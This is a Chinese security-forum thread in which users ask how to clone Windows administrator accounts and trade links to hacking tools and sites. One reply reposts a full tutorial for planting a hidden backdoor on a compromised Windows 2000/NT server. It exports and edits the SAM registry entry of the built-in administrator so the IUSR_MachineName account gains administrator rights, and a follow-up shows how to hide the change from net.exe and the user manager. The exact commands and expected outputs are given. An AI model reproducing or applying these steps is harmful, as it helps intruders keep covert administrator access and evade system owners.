|
作者: zhuyaping [zhuyaping] 论坛用户 | 登录 |
尽量详细一些! |
地主 发表时间: 12/12 13:26 |
回复: naforce [naforce] 论坛用户 | 登录 |
CA容易上手!可以远程克隆账号 |
B1层 发表时间: 12/12 13:42 |
回复: feng_1185 [feng_1185] 论坛用户 | 登录 |
哪里有给介绍一个~~~ |
B2层 发表时间: 12/12 15:30 |
回复: naforce [naforce] 论坛用户 | 登录 |
小凤居www.chinesehack.com有CA下载 |
B3层 发表时间: 12/12 16:21 |
回复: feng_1185 [feng_1185] 论坛用户 | 登录 |
你又来捣乱了~~~ |
B4层 发表时间: 12/12 16:35 |
回复: afan271314 [afan271314] 论坛用户 | 登录 |
你那是小凤居的网址吗 |
B5层 发表时间: 12/12 17:19 |
回复: cyshaoping [cyshaoping] 论坛用户 | 登录 |
http://www.chinesehack.org/ |
B6层 发表时间: 12/12 18:33 |
回复: liuyun056 [liuyun056] 论坛用户 | 登录 |
去 www.netsill.com 那有克隆帐号的教程 我就是在那学的。 |
B7层 发表时间: 12/14 10:19 |
回复: fjs [fjs] 论坛用户 | 登录 |
经常看到一些人在入侵一台Windows 2000或者Windows NT后堂而皇之地创建一个管理员组的用户,似乎当管理员不存在一般,今天偶违背一下偶以前的初衷,Share一个类似于RootKit的玩艺,当然,这些过程也是可以用脚本实现的,但是我就不写了,OK,Show Time Now。 首先要让大家知道的概念是在Windows 2000和Windows NT里,默认管理员帐号的SID是固定的500(0x1f4),那么我们可以用机器里已经存在的一个帐号将SID为500的帐号进行克隆,在这里我们选择的帐号是IUSR_MachineName(当然,为了加强隐蔽性,我们选择了这个帐号,所有用户都可以用以下的方法,只不过这个用户较常见罢了),测试环境为Windows 2000 Server。 运行一个System的CMD Shell( http://www.sometips.com/tips/scripts/173.htm 或使用 Http://www.sometips.com/soft/psu.exe),然后在该CMD Shell里面运行 regedit /e adam.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 这样我们将SID 为500的管理员帐号的相关信息导出,然后编辑adam.reg文件,将adam.reg文件的第三行--[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]最后的'1F4'修改为IUSR_MachineName的SID(大部分的机器该用户的SID都为0x3E9,如果机器在最初安装的时候没有安装IIS,而自己创建了帐号后再安装IIS就有可能不是这个值),将Root.reg文件中的'1F4'修改为'3E9'后执行 regedit /s adam.reg 导入该Reg文件 然后运行 net user IUSR_MachineName Sometips 修改IUSR_MachineName的密码(最好使用14位的密码,越像IUSR_MachineName的密码越好) OK,大功告成... 这样,我们拥有和默认管理员一样的桌面、一样的Profile..... 而且,当我们运行 net localgroup administrators 时,看看结果: C:\>net localgroup administrators Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator The command completed successfully. 再看看USER2SID的输出结果: C:\>user2sid Administrator S-1-5-21-1004336348-1078145449-854245398-500 Number of subauthorities is 5 Domain is IDONTKNOW Length of SID in memory is 28 bytes Type of SID is SidTypeUser C:\>user2sid iusr_machinename S-1-5-21-1004336348-1078145449-854245398-1001 Number of subauthorities is 5 Domain is IDONTKNOW Length of SID in memory is 28 bytes Type of SID is SidTypeUser 我想,再高明的管理员也看不到任何的异状了...而且,随便管理员改成什么密码,我照样可以用IUSR_MachineName,密码为Sometips登陆...(没有哪位大侠级的管理员喜欢经常修改IUSR_MachineName为其他的名字吧) ^_^,这算不算RootKit... 附: 1、感谢叮叮付出需要reinstall OS的代价... 2、任何用以上方法进行试验所导致的系统无法使用均与偶无关,偶均不提供技术支持... ----------------------------------------------------------------------------- 叮叮 的补充完善 很多人提到使用了管理工具的用户管理后,能够发现IUSR_MachineName被提升了权限。 现给出解决办法。 方法同上,不过这次修改内容多一些。即 这次要导出两个key内容: 一个是adam提到的 regedit /e adam.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 然后另外一个是你需要修改那个账号的值 regedit /e iusr.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003E9 然后按照adam提到的修改adam.reg “将adam.reg文件的第三行--[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]最后的'1F4'修改为IUSR_MachineName的SID” 现在,你还要从iusr.reg文件中复制一下内容 就是将iusr.reg文件中“'V'=hex:0”开始一直到iusr.reg文件结束部分复制下来 然后替换掉adam.reg中同样位置的部分 最后使用 regedit /s adam.reg 导入该Reg文件 呵呵,别忘了给这个IUSR_MachineName改密码哦。 hehe,ok,大功告成。 现在IUSR_MachineName账号拥有了管理员的权限,但是你使用net.exe和 管理工具中的用户管理都将看不到任何痕迹,即使你去察看所属于的组和用户。 都和修改前没有任何区别。 |
B8层 发表时间: 12/14 16:15 |
回复: lijingxi [lijingxi] 见习版主 | 登录 |
CA 和CCA 这2个工具一个是克隆帐号 一个是查看克隆帐号的! 喜欢的话可以自己去下载 很多地方都有的! 但是有一些杀毒软件认为CA 是病毒 你自己小心哦! |
B9层 发表时间: 12/14 16:23 |
回复: aaron3826 [aaron3826] 论坛用户 | 登录 |
第十二期的〈电脑迷〉有详细的说明,可以买一本看一下。 |
B10层 发表时间: 12/14 16:55 |
回复: zerosmile [zerosmile] 论坛用户 | 登录 |
有没有人会PSU.EXE啊? |
B11层 发表时间: 12/15 12:23 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号